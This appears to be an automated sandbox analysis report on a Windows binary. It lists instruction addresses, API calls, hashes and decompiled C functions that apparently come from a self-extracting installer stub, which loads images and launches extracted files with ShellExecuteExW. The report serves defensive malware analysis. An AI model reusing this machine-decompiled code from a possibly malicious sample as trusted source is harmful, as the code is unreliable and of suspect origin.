                                                                                                                                                    0x0121d5a4
                                                                                                                                                    0x0121d5a7
                                                                                                                                                    0x0121d5a9
                                                                                                                                                    0x0121d8bc
                                                                                                                                                    0x0121d8bc
                                                                                                                                                    0x0121d8c0
                                                                                                                                                    0x0121d8c1
                                                                                                                                                    0x0121d8c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d8ca
                                                                                                                                                    0x0121d8ce
                                                                                                                                                    0x0121d920
                                                                                                                                                    0x0121d921
                                                                                                                                                    0x0121d924
                                                                                                                                                    0x0121d94a
                                                                                                                                                    0x0121d95a
                                                                                                                                                    0x0121d95f
                                                                                                                                                    0x0121d965
                                                                                                                                                    0x0121d967
                                                                                                                                                    0x0121d942
                                                                                                                                                    0x0121d942
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d942
                                                                                                                                                    0x0121d928
                                                                                                                                                    0x0121d929
                                                                                                                                                    0x0121d92c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d92e
                                                                                                                                                    0x0121d92e
                                                                                                                                                    0x0121d934
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d93d
                                                                                                                                                    0x0121d941
                                                                                                                                                    0x0121d941
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d941
                                                                                                                                                    0x0121d8d0
                                                                                                                                                    0x0121d8d6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d8e0
                                                                                                                                                    0x0121d8e0
                                                                                                                                                    0x0121d8e3
                                                                                                                                                    0x0121d90a
                                                                                                                                                    0x0121d90c
                                                                                                                                                    0x0121d90f
                                                                                                                                                    0x0121d910
                                                                                                                                                    0x0121d914
                                                                                                                                                    0x0121d915
                                                                                                                                                    0x0121d918
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d918
                                                                                                                                                    0x0121d8e5
                                                                                                                                                    0x0121d8e5
                                                                                                                                                    0x0121d8e8
                                                                                                                                                    0x0121d906
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d906
                                                                                                                                                    0x0121d8ea
                                                                                                                                                    0x0121d8ea
                                                                                                                                                    0x0121d8ed
                                                                                                                                                    0x0121d902
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d902
                                                                                                                                                    0x0121d8ef
                                                                                                                                                    0x0121d8ef
                                                                                                                                                    0x0121d8f2
                                                                                                                                                    0x0121d8fe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d8fe
                                                                                                                                                    0x0121d8f5
                                                                                                                                                    0x0121d8f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d8fa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d8fa
                                                                                                                                                    0x0121d5af
                                                                                                                                                    0x0121d5b4
                                                                                                                                                    0x0121d5b8
                                                                                                                                                    0x0121d5c4
                                                                                                                                                    0x0121d5c6
                                                                                                                                                    0x0121d5c7
                                                                                                                                                    0x0121d5cb
                                                                                                                                                    0x0121d7c0
                                                                                                                                                    0x0121d7c3
                                                                                                                                                    0x0121d7ca
                                                                                                                                                    0x0121d7cf
                                                                                                                                                    0x0121d7d1
                                                                                                                                                    0x0121d8b6
                                                                                                                                                    0x0121d8b6
                                                                                                                                                    0x0121d8b9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d8b9
                                                                                                                                                    0x0121d7e3
                                                                                                                                                    0x0121d7f4
                                                                                                                                                    0x0121d7f9
                                                                                                                                                    0x0121d7fe
                                                                                                                                                    0x0121d800
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d808
                                                                                                                                                    0x0121d81b
                                                                                                                                                    0x0121d830
                                                                                                                                                    0x0121d845
                                                                                                                                                    0x0121d85a
                                                                                                                                                    0x0121d872
                                                                                                                                                    0x0121d877
                                                                                                                                                    0x0121d87a
                                                                                                                                                    0x0121d87c
                                                                                                                                                    0x0121d87e
                                                                                                                                                    0x0121d87e
                                                                                                                                                    0x0121d881
                                                                                                                                                    0x0121d887
                                                                                                                                                    0x0121d887
                                                                                                                                                    0x0121d89a
                                                                                                                                                    0x0121d89a
                                                                                                                                                    0x0121d89c
                                                                                                                                                    0x0121d89f
                                                                                                                                                    0x0121d8a0
                                                                                                                                                    0x0121d8a0
                                                                                                                                                    0x0121d8a4
                                                                                                                                                    0x0121d8a7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d8a9
                                                                                                                                                    0x0121d8a9
                                                                                                                                                    0x0121d8ad
                                                                                                                                                    0x0121d65f
                                                                                                                                                    0x0121d65f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d65f
                                                                                                                                                    0x0121d8b3
                                                                                                                                                    0x0121d8b3
                                                                                                                                                    0x0121d8a0
                                                                                                                                                    0x0121d8a4
                                                                                                                                                    0x0121d8a7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d8a7
                                                                                                                                                    0x0121d8a0
                                                                                                                                                    0x0121d5d1
                                                                                                                                                    0x0121d5d4
                                                                                                                                                    0x0121d5d4
                                                                                                                                                    0x0121d5d7
                                                                                                                                                    0x0121d5da
                                                                                                                                                    0x0121d5e1
                                                                                                                                                    0x0121d5e8
                                                                                                                                                    0x0121d5ef
                                                                                                                                                    0x0121d5f6
                                                                                                                                                    0x0121d5f9
                                                                                                                                                    0x0121d60a
                                                                                                                                                    0x0121d611
                                                                                                                                                    0x0121d616
                                                                                                                                                    0x0121d61b
                                                                                                                                                    0x0121d61c
                                                                                                                                                    0x0121d61e
                                                                                                                                                    0x0121d636
                                                                                                                                                    0x0121d636
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d636
                                                                                                                                                    0x0121d623
                                                                                                                                                    0x0121d625
                                                                                                                                                    0x0121d62a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d62c
                                                                                                                                                    0x0121d62e
                                                                                                                                                    0x0121d62e
                                                                                                                                                    0x0121d631
                                                                                                                                                    0x0121d639
                                                                                                                                                    0x0121d639
                                                                                                                                                    0x0121d63a
                                                                                                                                                    0x0121d63a
                                                                                                                                                    0x0121d63f
                                                                                                                                                    0x0121d642
                                                                                                                                                    0x0121d644
                                                                                                                                                    0x0121d646
                                                                                                                                                    0x0121d6fe
                                                                                                                                                    0x0121d701
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d707
                                                                                                                                                    0x0121d707
                                                                                                                                                    0x0121d707
                                                                                                                                                    0x0121d70b
                                                                                                                                                    0x0121d70e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d710
                                                                                                                                                    0x0121d710
                                                                                                                                                    0x0121d714
                                                                                                                                                    0x0121d719
                                                                                                                                                    0x0121d71c
                                                                                                                                                    0x0121d721
                                                                                                                                                    0x0121d722
                                                                                                                                                    0x0121d724
                                                                                                                                                    0x0121d727
                                                                                                                                                    0x0121d748
                                                                                                                                                    0x0121d74a
                                                                                                                                                    0x0121d762
                                                                                                                                                    0x0121d767
                                                                                                                                                    0x0121d76a
                                                                                                                                                    0x0121d76d
                                                                                                                                                    0x0121d770
                                                                                                                                                    0x0121d793
                                                                                                                                                    0x0121d796
                                                                                                                                                    0x0121d79b
                                                                                                                                                    0x0121d79d
                                                                                                                                                    0x0121d79d
                                                                                                                                                    0x0121d7b3
                                                                                                                                                    0x0121d7b8
                                                                                                                                                    0x0121d772
                                                                                                                                                    0x0121d77e
                                                                                                                                                    0x0121d786
                                                                                                                                                    0x0121d78b
                                                                                                                                                    0x0121d78b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d729
                                                                                                                                                    0x0121d729
                                                                                                                                                    0x0121d729
                                                                                                                                                    0x0121d72c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d72e
                                                                                                                                                    0x0121d731
                                                                                                                                                    0x0121d734
                                                                                                                                                    0x0121d73c
                                                                                                                                                    0x0121d73f
                                                                                                                                                    0x0121d740
                                                                                                                                                    0x0121d743
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d743
                                                                                                                                                    0x0121d745
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d745
                                                                                                                                                    0x0121d716
                                                                                                                                                    0x0121d716
                                                                                                                                                    0x0121d707
                                                                                                                                                    0x0121d707
                                                                                                                                                    0x0121d70b
                                                                                                                                                    0x0121d70e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d70e
                                                                                                                                                    0x0121d707
                                                                                                                                                    0x0121d65a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d65a
                                                                                                                                                    0x0121d5ba
                                                                                                                                                    0x0121d5ba
                                                                                                                                                    0x0121d5be
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d662
                                                                                                                                                    0x0121d662
                                                                                                                                                    0x0121d662
                                                                                                                                                    0x0121d66b
                                                                                                                                                    0x0121d66e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d567
                                                                                                                                                    0x0121d568
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d56d
                                                                                                                                                    0x0121d565
                                                                                                                                                    0x0121d4f2
                                                                                                                                                    0x0121d4f4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d32d
                                                                                                                                                    0x0121d32d
                                                                                                                                                    0x0121d330
                                                                                                                                                    0x0121d339
                                                                                                                                                    0x0121d33e
                                                                                                                                                    0x0121d33f
                                                                                                                                                    0x0121d33f
                                                                                                                                                    0x0121d347
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121d347

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 0121D286
                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0121D2A7
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0121D268,?), ref: 0121D2C2
                                                                                                                                                    • __fprintf_l.LIBCMT ref: 0121D7B3
                                                                                                                                                      • Part of subcall function 012212D6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0121B592,00000000,?,?,?,0016006C), ref: 012212F2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                                                                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                                                                                    • API String ID: 4184910265-980926923
                                                                                                                                                    • Opcode ID: 7b0910c5557346f92553e621b2349af95775b9c20f93b1d91bbbdf057b581deb
                                                                                                                                                    • Instruction ID: 1f429d92bd7b61882e9dfc0aaa5c4046681b66af42c86a8d10ff34f669b0e0ba
                                                                                                                                                    • Opcode Fuzzy Hash: 7b0910c5557346f92553e621b2349af95775b9c20f93b1d91bbbdf057b581deb
                                                                                                                                                    • Instruction Fuzzy Hash: BB12C17192021EEEDB25DFA8D849BFEB7F5FF64300F500469E609A7185EB709941CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122C9E2, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0122C9E2() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E0122ABC4(); // executed
				_t46 = GetDlgItem( *0x1257438, 0x68);
				_t49 =  *0x1257446; // 0x1
				if(_t49 == 0) {
					_t44 =  *0x1257458; // 0x0
					E0122895E(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0x12425b4);
					 *0x1257446 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}








                                                                                                                                                    0x0122c9e9
                                                                                                                                                    0x0122ca03
                                                                                                                                                    0x0122ca08
                                                                                                                                                    0x0122ca0e
                                                                                                                                                    0x0122ca10
                                                                                                                                                    0x0122ca16
                                                                                                                                                    0x0122ca1e
                                                                                                                                                    0x0122ca29
                                                                                                                                                    0x0122ca37
                                                                                                                                                    0x0122ca3d
                                                                                                                                                    0x0122ca3d
                                                                                                                                                    0x0122ca4d
                                                                                                                                                    0x0122ca57
                                                                                                                                                    0x0122ca67
                                                                                                                                                    0x0122ca6f
                                                                                                                                                    0x0122ca73
                                                                                                                                                    0x0122ca78
                                                                                                                                                    0x0122ca7e
                                                                                                                                                    0x0122ca89
                                                                                                                                                    0x0122ca93
                                                                                                                                                    0x0122ca9b
                                                                                                                                                    0x0122ca9b
                                                                                                                                                    0x0122caab
                                                                                                                                                    0x0122cab9
                                                                                                                                                    0x0122cac8
                                                                                                                                                    0x0122cad0
                                                                                                                                                    0x0122cade
                                                                                                                                                    0x0122caef
                                                                                                                                                    0x0122caef
                                                                                                                                                    0x0122cb0b

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0122ABC4: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0122ABD5
                                                                                                                                                      • Part of subcall function 0122ABC4: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0122ABE6
                                                                                                                                                      • Part of subcall function 0122ABC4: IsDialogMessageW.USER32(0016006C,?), ref: 0122ABFA
                                                                                                                                                      • Part of subcall function 0122ABC4: TranslateMessage.USER32(?), ref: 0122AC08
                                                                                                                                                      • Part of subcall function 0122ABC4: DispatchMessageW.USER32(?), ref: 0122AC12
                                                                                                                                                    • GetDlgItem.USER32(00000068,0126DCA8), ref: 0122C9F6
                                                                                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0122A5B2), ref: 0122CA1E
                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0122CA29
                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,012425B4), ref: 0122CA37
                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0122CA4D
                                                                                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0122CA67
                                                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0122CAAB
                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0122CAB9
                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0122CAC8
                                                                                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0122CAEF
                                                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,0124331C), ref: 0122CAFE
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                    • String ID: \
                                                                                                                                                    • API String ID: 3569833718-2967466578
                                                                                                                                                    • Opcode ID: 4e84f409bbf2e454de974010447c0299c50302aee8852ce1d677a5a3be951aec
                                                                                                                                                    • Instruction ID: 9835d15951f6a17fddf18d87adf2074e133cebf8f83042c94627ee9824bbb8cf
                                                                                                                                                    • Opcode Fuzzy Hash: 4e84f409bbf2e454de974010447c0299c50302aee8852ce1d677a5a3be951aec
                                                                                                                                                    • Instruction Fuzzy Hash: D531BC71255382BBE3229F24AC4EFAF7FACEF42714F000918FA4196285DB7549148BB6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01229D9A, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 100memorywindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 54%
                                                                                                                                                    			E01229D9A(WCHAR* _a4) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr* _v28;
				void* __ecx;
				struct HRSRC__* _t14;
				char _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				intOrPtr* _t26;
				char* _t33;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				long _t44;
				intOrPtr* _t46;
				struct HRSRC__* _t47;

				_t14 = FindResourceW( *0x124fed0, _a4, "PNG"); // executed
				_t47 = _t14;
				if(_t47 == 0) {
					return _t14;
				}
				_t44 = SizeofResource( *0x124fed0, _t47);
				if(_t44 == 0) {
					L4:
					_t16 = 0;
					L16:
					return _t16;
				}
				_t17 = LoadResource( *0x124fed0, _t47);
				if(_t17 == 0) {
					goto L4;
				}
				_t18 = LockResource(_t17);
				_t48 = _t18;
				if(_t18 != 0) {
					_v4 = 0;
					_t19 = GlobalAlloc(2, _t44); // executed
					_t35 = _t19;
					if(_t35 == 0) {
						L15:
						_t16 = _v4;
						goto L16;
					}
					if(GlobalLock(_t35) == 0) {
						L14:
						GlobalFree(_t35);
						goto L15;
					}
					E0122F300(_t20, _t48, _t44);
					_v8 = 0;
					_push( &_v8);
					_push(0);
					_push(_t35);
					if( *0x1271178() == 0) {
						_t26 = E01229D2F(_t24, _t37, _v20, 0); // executed
						_t38 = _v28;
						_t46 = _t26;
						 *0x1242260(_t38);
						 *((intOrPtr*)( *((intOrPtr*)( *_t38 + 8))))();
						if(_t46 != 0) {
							 *((intOrPtr*)(_t46 + 8)) = 0;
							if( *((intOrPtr*)(_t46 + 8)) == 0) {
								_push(0xffffff);
								_t33 =  &_v20;
								_push(_t33);
								_push( *((intOrPtr*)(_t46 + 4)));
								L0122E08E(); // executed
								if(_t33 != 0) {
									 *((intOrPtr*)(_t46 + 8)) = _t33;
								}
							}
							 *0x1242260(1);
							 *((intOrPtr*)( *((intOrPtr*)( *_t46))))();
						}
					}
					GlobalUnlock(_t35);
					goto L14;
				}
				goto L4;
			}





















                                                                                                                                                    0x01229dac
                                                                                                                                                    0x01229db2
                                                                                                                                                    0x01229db6
                                                                                                                                                    0x01229eb0
                                                                                                                                                    0x01229eb0
                                                                                                                                                    0x01229dca
                                                                                                                                                    0x01229dce
                                                                                                                                                    0x01229dee
                                                                                                                                                    0x01229dee
                                                                                                                                                    0x01229eac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229eac
                                                                                                                                                    0x01229dd7
                                                                                                                                                    0x01229ddf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229de2
                                                                                                                                                    0x01229de8
                                                                                                                                                    0x01229dec
                                                                                                                                                    0x01229dfc
                                                                                                                                                    0x01229e00
                                                                                                                                                    0x01229e06
                                                                                                                                                    0x01229e0a
                                                                                                                                                    0x01229ea6
                                                                                                                                                    0x01229ea6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229eab
                                                                                                                                                    0x01229e19
                                                                                                                                                    0x01229e9f
                                                                                                                                                    0x01229ea0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229ea0
                                                                                                                                                    0x01229e22
                                                                                                                                                    0x01229e2a
                                                                                                                                                    0x01229e32
                                                                                                                                                    0x01229e33
                                                                                                                                                    0x01229e34
                                                                                                                                                    0x01229e3d
                                                                                                                                                    0x01229e44
                                                                                                                                                    0x01229e49
                                                                                                                                                    0x01229e4d
                                                                                                                                                    0x01229e57
                                                                                                                                                    0x01229e5d
                                                                                                                                                    0x01229e61
                                                                                                                                                    0x01229e66
                                                                                                                                                    0x01229e6b
                                                                                                                                                    0x01229e6d
                                                                                                                                                    0x01229e72
                                                                                                                                                    0x01229e76
                                                                                                                                                    0x01229e77
                                                                                                                                                    0x01229e7a
                                                                                                                                                    0x01229e81
                                                                                                                                                    0x01229e83
                                                                                                                                                    0x01229e83
                                                                                                                                                    0x01229e81
                                                                                                                                                    0x01229e8e
                                                                                                                                                    0x01229e96
                                                                                                                                                    0x01229e96
                                                                                                                                                    0x01229e61
                                                                                                                                                    0x01229e99
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229e99
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • FindResourceW.KERNELBASE(0122AD89,PNG,?,?,?,0122AD89,00000066), ref: 01229DAC
                                                                                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0122AD89,00000066), ref: 01229DC4
                                                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0122AD89,00000066), ref: 01229DD7
                                                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0122AD89,00000066), ref: 01229DE2
                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0122AD89,00000066), ref: 01229E00
                                                                                                                                                    • GlobalLock.KERNEL32 ref: 01229E11
                                                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 01229E7A
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 01229E99
                                                                                                                                                    • GlobalFree.KERNEL32 ref: 01229EA0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                                                                                                                    • String ID: PNG
                                                                                                                                                    • API String ID: 4097654274-364855578
                                                                                                                                                    • Opcode ID: 145318f5cc89d6050636ae42d702d82c2c75702212a840295250158571fb4b69
                                                                                                                                                    • Instruction ID: 47b70fc735eb0a3ceb7208ef5fc0cd8c8d2124774c4c4a6b8ecbba6007187680
                                                                                                                                                    • Opcode Fuzzy Hash: 145318f5cc89d6050636ae42d702d82c2c75702212a840295250158571fb4b69
                                                                                                                                                    • Instruction Fuzzy Hash: AA31707A610327BFDB219F26FC4C92FBFA9FF85A55B040529FA0592215DB71D8408B60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122CC9F, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 178COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E0122CC9F(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, int _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, signed short* _a4168, intOrPtr _a4172) {
				signed short _v0;
				long _v12;
				void* __edi;
				int _t54;
				signed int _t57;
				signed short* _t58;
				long _t68;
				int _t77;
				intOrPtr _t80;
				signed int _t81;
				signed short* _t82;
				signed short _t83;
				long _t86;
				signed short* _t87;
				void* _t88;
				signed short* _t91;
				struct HWND__* _t93;
				void* _t94;
				void* _t95;
				void* _t98;

				_t94 = __ebp;
				_t54 = 0x1040;
				E0122E1C0();
				_t91 = _a4168;
				_t77 = 0;
				if( *_t91 == 0) {
					L55:
					return _t54;
				}
				_t54 = E012333F3(_t91);
				if(0x1040 >= 0x7f6) {
					goto L55;
				} else {
					_t86 = 0x3c;
					E0122F1A0(_t86,  &_a4, 0, _t86);
					_t80 = _a4172;
					_t98 = _t98 + 0xc;
					_a4.cbSize = _t86;
					_a8 = 0x1c0;
					if(_t80 != 0) {
						_a8 = 0x5c0;
					}
					_t81 =  *_t91 & 0x0000ffff;
					_t87 =  &(_t91[1]);
					_push(_t94);
					_t95 = 0x22;
					if(_t81 != _t95) {
						_t87 = _t91;
					}
					_a20 = _t87;
					_t57 = _t77;
					if(_t81 == 0) {
						L13:
						_t58 = _a24;
						L14:
						if(_t58 == 0 ||  *_t58 == _t77) {
							if(_t80 == 0 &&  *0x125a472 != _t77) {
								_a24 = 0x125a472;
							}
						}
						_a32 = 1;
						_t88 = E0121B3D3(_t87);
						if(_t88 != 0 && E01221708(_t88, L".inf") == 0) {
							_a16 = L"Install";
						}
						if(E0121A0C0(_a20) != 0) {
							E0121B179(_a20,  &_a64, 0x800);
							_a8 =  &_a52;
						}
						_t54 = ShellExecuteExW( &_a4); // executed
						if(_t54 != 0) {
							_t93 = _a4160;
							if( *0x1258468 != _t77 || _a4168 != _t77 ||  *0x126dc91 != _t77) {
								if(_t93 != 0) {
									_push(_t93);
									if( *0x12710a4() != 0) {
										ShowWindow(_t93, _t77);
										_t77 = 1;
									}
								}
								 *0x12710a0(_a56, 0x7d0);
								E0122D163(_a48);
								if( *0x126dc91 != 0 && _a4160 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
									_t68 = _v12;
									if(_t68 >  *0x126dc94) {
										 *0x126dc94 = _t68;
									}
									 *0x126dc92 = 1;
								}
							}
							CloseHandle(_a48);
							if(_t88 == 0 || E01221708(_t88, L".exe") != 0) {
								_t54 = _a4160;
								if( *0x1258468 != 0 && _t54 == 0 &&  *0x126dc91 == _t54) {
									 *0x126dc98 = 0x1b58;
								}
							} else {
								_t54 = _a4160;
							}
							if(_t77 != 0 && _t54 != 0) {
								_t54 = ShowWindow(_t93, 1);
							}
						}
						goto L55;
					}
					_t82 = _t91;
					_v0 = 0x20;
					do {
						if( *_t82 == _t95) {
							while(1) {
								_t57 = _t57 + 1;
								if(_t91[_t57] == _t77) {
									break;
								}
								if(_t91[_t57] == _t95) {
									_t83 = _v0;
									_t91[_t57] = _t83;
									L10:
									if(_t91[_t57] == _t83 ||  *((short*)(_t91 + 2 + _t57 * 2)) == 0x2f) {
										if(_t91[_t57] == _v0) {
											_t91[_t57] = 0;
										}
										_t58 =  &(_t91[_t57 + 1]);
										_a24 = _t58;
										goto L14;
									} else {
										goto L12;
									}
								}
							}
						}
						_t83 = _v0;
						goto L10;
						L12:
						_t57 = _t57 + 1;
						_t82 =  &(_t91[_t57]);
					} while ( *_t82 != _t77);
					goto L13;
				}
			}























                                                                                                                                                    0x0122cc9f
                                                                                                                                                    0x0122cc9f
                                                                                                                                                    0x0122cca4
                                                                                                                                                    0x0122ccab
                                                                                                                                                    0x0122ccb2
                                                                                                                                                    0x0122ccb7
                                                                                                                                                    0x0122cf05
                                                                                                                                                    0x0122cf0d
